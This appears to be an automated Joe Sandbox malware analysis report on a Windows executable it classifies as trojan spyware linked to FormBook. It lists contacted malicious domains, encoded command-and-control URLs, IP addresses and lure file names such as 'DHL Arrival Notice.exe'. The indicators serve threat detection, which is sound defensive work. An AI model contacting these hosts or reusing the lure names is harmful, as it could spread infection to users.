          http://www.adoby.xyz/ghq5/100%Avira URL Cloudmalware
          https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css0%Avira URL Cloudsafe
          https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz100%Avira URL Cloudmalware
          https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
          http://www.synergon.space/zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4R0%Avira URL Cloudsafe
          http://www.washio.world/uox9/0%Avira URL Cloudsafe
          http://www.0araba.net/s5jh/0%Avira URL Cloudsafe
          https://reg.ru0%Avira URL Cloudsafe
          https://www.reg.ru/whois/?check=&dname=www.washio.world&amp;reg_source=parking_auto0%Avira URL Cloudsafe
          https://dhosting.pl/img/logo.svg0%Avira URL Cloudsafe
          https://dhosting.pl/bledyhttp/domeny.html0%Avira URL Cloudsafe
          https://www.reg.ru/web-sites/website-builder/?utm_source=www.washio.world&utm_medium=parking&utm_cam0%Avira URL Cloudsafe
          https://track.uc.cn/collect0%Avira URL Cloudsafe
          https://parking.reg.ru/script/get_domain_data?domain_name=www.washio.world&rand=0%Avira URL Cloudsafe
          http://www.0araba.net/s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4R0%Avira URL Cloudsafe
          http://www.adoby.xyz/ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4R100%Avira URL Cloudmalware
          http://www.coinwab.com/efdt/0%Avira URL Cloudsafe
          https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
          https://dhosting.pl/kontakt0%Avira URL Cloudsafe
          https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt0%Avira URL Cloudsafe
          https://dhosting.pl/bledyhttp/hosting.html0%Avira URL Cloudsafe
          http://www.personalcaresale.shop/2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4R0%Avira URL Cloudsafe
          https://dhosting.pl0%Avira URL Cloudsafe
          http://www.coinwab.com/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4R0%Avira URL Cloudsafe
          http://www.abc8web.com/sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R100%Avira URL Cloudmalware
          https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
          https://www.reg.ru/dedicated/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ser0%Avira URL Cloudsafe
          https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
          https://www.reg.ru/web-sites/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_cms0%Avira URL Cloudsafe
          http://www.mqmsqkw.lol/pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4R0%Avira URL Cloudsafe
          http://www.0araba.net0%Avira URL Cloudsafe
          https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
          https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD100%Avira URL Cloudmalware
          http://www.6666111p.vip/7c6d/?wd98XJp=w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50=&2hZdq=H6f4R0%Avira URL Cloudsafe
          http://www.threendresses.com/ecb1/100%Avira URL Cloudmalware
          http://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R100%Avira URL Cloudmalware
          https://www.reg.ru/hosting/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_host&0%Avira URL Cloudsafe
          https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js0%Avira URL Cloudsafe
          https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
          https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
          https://www.reg.ru/domain/new/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_ne0%Avira URL Cloudsafe
          http://www.mqmsqkw.lol/pqva/0%Avira URL Cloudsafe
          http://www.abc8web.com/sm5e/100%Avira URL Cloudmalware
          http://www.personalcaresale.shop/2nu3/0%Avira URL Cloudsafe
          http://www.6666111p.vip/7c6d/0%Avira URL Cloudsafe
          http://www.washio.world/uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4R0%Avira URL Cloudsafe
          http://www.synergon.space/zgi4/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.kosherphonestore.com.cdn.hstgr.net
          		84.32.84.112
          		truetrue
            		unknown
            threendresses.com
            		78.111.111.51
            		truetrue
              		unknown
              www.washio.world
              		194.58.112.174
              		truefalse
                		unknown
                www.personalcaresale.shop
                		172.67.200.242
                		truetrue
                  		unknown
                  www.adoby.xyz
                  		162.0.213.72
                  		truetrue
                    		unknown
                    www.6666111p.vip
                    		35.186.221.100
                    		truefalse
                      		unknown
                      abc8web.com
                      		3.33.130.190
                      		truetrue
                        		unknown
                        www.mqmsqkw.lol
                        		116.213.43.190
                        		truetrue
                          		unknown
                          synergon.space
                          		109.95.158.127
                          		truetrue
                            		unknown
                            www.coinwab.com
                            		188.114.97.3
                            		truetrue
                              		unknown
                              rtrpodcast.online
                              		76.223.67.189
                              		truefalse
                                		unknown
                                www.0araba.net
                                		46.30.211.38
                                		truefalse
                                  		unknown
                                  www.miningarea.fun
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.threendresses.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.kosherphonestore.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.com-kh.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.rtrpodcast.online
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.synergon.space
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.abc8web.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.wepayassessments.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.synergon.space/zgi4/?wd98XJp=Bv8WP0Y6I4L4rkLxeI7P9FySYZNc9GwgDECc8onmv+Up0YCRhWOMiFe4VqushDbL0H+yYl3KgA/w0/Chwa1nzYna+/yL7Br3qSv0RQdnV5Z6V6VBi/tSxM4=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.0araba.net/s5jh/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.adoby.xyz/ghq5/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.washio.world/uox9/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.0araba.net/s5jh/?wd98XJp=1TiKqhVN19vKBh0iYV68FE6kd9yptaYL0yZFpqoiJ2lM+QkJ7dUu1EsavkeNrTvMwGcxWHp0eakXjUqcr3ub0eMvg/6QMTuDK9dTv3I1AhU9igMWM3XHjus=&2hZdq=H6f4Rfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.adoby.xyz/ghq5/?wd98XJp=dNjYg/LNb+Btw7/gHk7XSMyPk/zPSOV1YOlLUnvgSo8eic1H8Ppx0PY9ldg0aj+ffPmEFDEyAFk9JBqMQ/w/NLyeMKaPgOi3ekgmu34KkG/nLXsYy1o9wJg=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.coinwab.com/efdt/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.abc8web.com/sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.personalcaresale.shop/2nu3/?wd98XJp=kpCfKF0WzJdSazQmt+Slz7YMxCL88Ck3GTDuMNK/H/Z7+vSkhcWJrxIVRHFhCg6b5G6dYsxeFoEulnLMEOj8SMB4wRe40fAIutKuKCnjbT5TVzUJ6OZr4Zg=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.coinwab.com/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4Cwt+rIU5CjwRGjorv42b71G2YZGZ8sEfFWk4L2DJaggYN2F6bElJhaqiOt+r3C6w5v7JMVR/VQKh9hDc+/lVPZE+6qMMIlI=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mqmsqkw.lol/pqva/?wd98XJp=ZKm3cPRqjLICFiRrATX7oY0MbRIIvi8qgjtP/vsOoinDFUrpWf4t7wcwUBRK5t7Qc0H9b4lf1rTESW8G/Q5oJQ2SGD/5MgBfv+zXfj20S4XoQgB8oyIQXRQ=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.threendresses.com/ecb1/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.6666111p.vip/7c6d/?wd98XJp=w8YgqO/Zj/36mufrJumMstPGQWcWOvmXve42clWXA0OufJxdz0t5qmDG9Y+qzl9OADQlddr1Os9brfaQNQSPZtNIRBmq9MUfYdPf/ru8jRm7NVZbS2vao50=&2hZdq=H6f4Rfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4Rtrue
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.personalcaresale.shop/2nu3/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mqmsqkw.lol/pqva/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.abc8web.com/sm5e/true
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.washio.world/uox9/?wd98XJp=SkqqSrQ8SMo2XL3atDg5EwteixjEHmcOkKNOXL2YXVO5YY42DfvwbKSww9pKtEGGvKt0lrGjy49L8DH+d/eZjL5PtpdyGoJABAcliTTSnjNRJ5qgIg1UjKg=&2hZdq=H6f4Rfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.6666111p.vip/7c6d/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.synergon.space/zgi4/true
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://reg.ruTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.jsTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.threendresses.com/ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6QzTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000672A000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005DAA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.reg.ru/whois/?check=&dname=www.washio.world&amp;reg_source=parking_autoTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.cssTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://track.uc.cn/collectTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.reg.ru/web-sites/website-builder/?utm_source=www.washio.world&utm_medium=parking&utm_camTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dhosting.pl/bledyhttp/domeny.htmlTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dhosting.pl/img/logo.svgTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://parking.reg.ru/script/get_domain_data?domain_name=www.washio.world&rand=TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dhosting.pl/kontaktPresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://hm.baidu.com/hm.js?TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://coinwab.com/index.php/efdt/?wd98XJp=MALnGsSsCxZXAJsklBHSyvV4CwtPresentationHost.exe, 00000006.00000002.4122364070.00000000060CE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dhosting.plPresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://dhosting.pl/bledyhttp/hosting.htmlTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006D72000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000063F2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.jsTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.reg.ru/dedicated/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_serTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.cssTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.reg.ru/web-sites/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_cmsTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.0araba.netTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4125575598.0000000008328000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://download.quark.cn/download/quarkpc?platform=android&ch=pcquarkTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BDTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000006406000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000005A86000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.0000000016EA6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  https://www.reg.ru/hosting/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_host&TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.jsTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.000000000754C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006BCC000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4123664562.0000000007AE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007096000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.0000000006716000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.reg.ru/domain/new/?utm_source=www.washio.world&utm_medium=parking&utm_campaign=s_land_neTzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000007228000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.00000000068A8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  35.186.221.100
                                                  		www.6666111p.vipUnited States
                                                  		15169GOOGLEUSfalse
                                                  78.111.111.51
                                                  		threendresses.comTurkey
                                                  		20649ASFIBERSUNUCUTRtrue
                                                  162.0.213.72
                                                  		www.adoby.xyzCanada
                                                  		35893ACPCAtrue
                                                  188.114.97.3
                                                  		www.coinwab.comEuropean Union
                                                  		13335CLOUDFLARENETUStrue
                                                  109.95.158.127
                                                  		synergon.spacePoland
                                                  		48896DHOSTING-ASWarsawPolandPLtrue
                                                  194.58.112.174
                                                  		www.washio.worldRussian Federation
                                                  		197695AS-REGRUfalse
                                                  46.30.211.38
                                                  		www.0araba.netDenmark
                                                  		51468ONECOMDKfalse
                                                  84.32.84.112
                                                  		www.kosherphonestore.com.cdn.hstgr.netLithuania
                                                  		33922NTT-LT-ASLTtrue
                                                  3.33.130.190
                                                  		abc8web.comUnited States
                                                  		8987AMAZONEXPANSIONGBtrue
                                                  116.213.43.190
                                                  		www.mqmsqkw.lolHong Kong
                                                  		63889CLOUDIVLIMITED-ASCloudIvLimitedHKtrue
                                                  172.67.200.242
                                                  		www.personalcaresale.shopUnited States
                                                  		13335CLOUDFLARENETUStrue

                                                  General Information

                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                  Analysis ID:1466073
                                                  Start date and time:2024-07-02 14:05:05 +02:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 7s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:nJ8mJTmMf0.exe
                                                  renamed because original name is a hash value
                                                  Original Sample Name:8e2c2721d94a488e27b363152a56ea079a7932b41144b71f385d8b37ca70aa2e.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@7/5@15/11
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:
                                                  • Successful, ratio: 92%
                                                  • Number of executed functions: 59
                                                  • Number of non-executed functions: 270
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: nJ8mJTmMf0.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:07:03API Interceptor10124554x Sleep call for process: PresentationHost.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  78.111.111.51DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • www.threendresses.com/ecb1/
                                                  Salary Raise.exeGet hashmaliciousFormBookBrowse
                                                  • www.threendresses.com/ecb1/
                                                  Salary List.exeGet hashmaliciousFormBookBrowse
                                                  • www.threendresses.com/ecb1/
                                                  162.0.213.72DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                  • www.adoby.xyz/ghq5/
                                                  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                  • www.devele.top/nm4d/
                                                  Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                  • www.hawalaz.xyz/ercr/
                                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                  • www.beescy.xyz/pdwc/
                                                  Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                  • www.beescy.xyz/pdwc/
